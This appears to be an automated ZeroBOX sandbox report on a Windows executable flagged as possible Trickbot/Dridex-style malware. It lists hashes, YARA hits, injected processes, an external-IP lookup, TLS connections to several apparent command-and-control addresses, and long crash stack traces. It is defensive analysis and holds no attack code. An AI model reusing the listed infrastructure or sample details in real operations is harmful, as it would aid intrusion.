Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 9, 2021, 9:52 a.m.	Sept. 9, 2021, 9:54 a.m.

Size	364.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`4f2e675ac43f180075d9b1f3316486f8`
SHA256	`70df9c391cc4f649aa2d4a989c146dbb26bf6a420cf5fef0e654009caf02b0c3`
CRC32	`340591DA`
ssdeep	`6144:CR8ByNfLHaa7hrsFVgbtpGVeUQJIjuixao4JSNnSHC0GC:CR8sLzhOVgbtpCxuQJ6S6C0G`
PDB Path	C:\Users\egypt\Desktop\source\microtable\Release\Tinashe.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library IsPE32 - (no description)

wermgr.exe C:\Windows\system32\wermgr.exe
2292
- svchost.exe C:\Windows\system32\svchost.exe
  1852

Name	Response	Post-Analysis Lookup
ipecho.net	A 34.117.59.81	34.117.59.81

IP Address	Status	Action
105.27.205.34	Active	Moloch
164.124.101.2	Active	Moloch
179.189.229.254	Active	Moloch
34.117.59.81	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49167 -> 179.189.229.254:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49170 -> 105.27.205.34:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49169 -> 179.189.229.254:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 179.189.229.254:443 -> 192.168.56.102:49169	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 105.27.205.34:443 -> 192.168.56.102:49170	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 179.189.229.254:443 -> 192.168.56.102:49167	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49168 -> 34.117.59.81:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.102:49168 -> 34.117.59.81:80	2022351	ET POLICY External IP Lookup - ipecho.net	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49167 179.189.229.254:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.102:49170 105.27.205.34:443	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50
TLSv1 192.168.56.102:49169 179.189.229.254:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 9, 2021, 9:53 a.m.	computer_name: TEST22-PC	1	1	0

This executable has a PDB path (1 event)

pdb_path

C:\Users\egypt\Desktop\source\microtable\Release\Tinashe.pdb

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

INIT

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 9, 2021, 9:53 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd hook_in_monitor+0x45 lde-0x133 @ 0x74e642ea New_ntdll_LdrGetProcedureAddress+0x43 New_ntdll_LdrLoadDll-0x156 @ 0x74e7f7f3 GetProcAddress+0x60 GetModuleHandleA-0x80 kernelbase+0x4190 @ 0x7fefde34190 SvchostPushServiceGlobals+0x471 WinHttpQueryOption-0x1a7b winhttp+0x1eb99 @ 0x7fef89aeb99 SvchostPushServiceGlobals+0x4fb WinHttpQueryOption-0x19f1 winhttp+0x1ec23 @ 0x7fef89aec23 WinHttpConnect+0x1ab WinHttpGetDefaultProxyConfiguration-0x1615 winhttp+0x13fe7 @ 0x7fef89a3fe7 exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x77919a5a registers.r14: 169734778 registers.r15: 5632890 registers.rcx: 0 registers.rsi: 855453888 registers.r10: 0 registers.rbx: 0 registers.rsp: 2353824 registers.r11: 0 registers.r8: 5 registers.r9: 1961940992 registers.rdx: 2 registers.r12: 3591200 registers.rbp: 0 registers.rdi: 0 registers.rax: 1 registers.r13: 443	1	0	0
__exception__ Sept. 9, 2021, 9:53 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd hook_in_monitor+0x45 lde-0x133 @ 0x74e642ea New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x74e7fc86 VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefde63096 VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefde630d6 VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x7724bbe1 0x9cf3d exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x77919a5a registers.r14: 855617600 registers.r15: 2350208 registers.rcx: 2470792156623991849 registers.rsi: 2349792 registers.r10: 0 registers.rbx: 3 registers.rsp: 2349400 registers.r11: 2470792156623991697 registers.r8: 3 registers.r9: 1961945856 registers.rdx: 3 registers.r12: 855443584 registers.rbp: 2470792156623991825 registers.rdi: 40 registers.rax: 4 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Sept. 9, 2021, 9:53 a.m.

stacktrace:

RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
hook_in_monitor+0x45 lde-0x133 @ 0x74e642ea
New_ntdll_LdrGetProcedureAddress+0x43 New_ntdll_LdrLoadDll-0x156 @ 0x74e7f7f3
GetProcAddress+0x60 GetModuleHandleA-0x80 kernelbase+0x4190 @ 0x7fefde34190
SvchostPushServiceGlobals+0x471 WinHttpQueryOption-0x1a7b winhttp+0x1eb99 @ 0x7fef89aeb99
SvchostPushServiceGlobals+0x4fb WinHttpQueryOption-0x19f1 winhttp+0x1ec23 @ 0x7fef89aec23
WinHttpConnect+0x1ab WinHttpGetDefaultProxyConfiguration-0x1615 winhttp+0x13fe7 @ 0x7fef89a3fe7

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x77919a5a
registers.r14: 169734778
registers.r15: 5632890
registers.rcx: 0
registers.rsi: 855453888
registers.r10: 0
registers.rbx: 0
registers.rsp: 2353824
registers.r11: 0
registers.r8: 5
registers.r9: 1961940992
registers.rdx: 2
registers.r12: 3591200
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 443

__exception__

Sept. 9, 2021, 9:53 a.m.

stacktrace:

RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
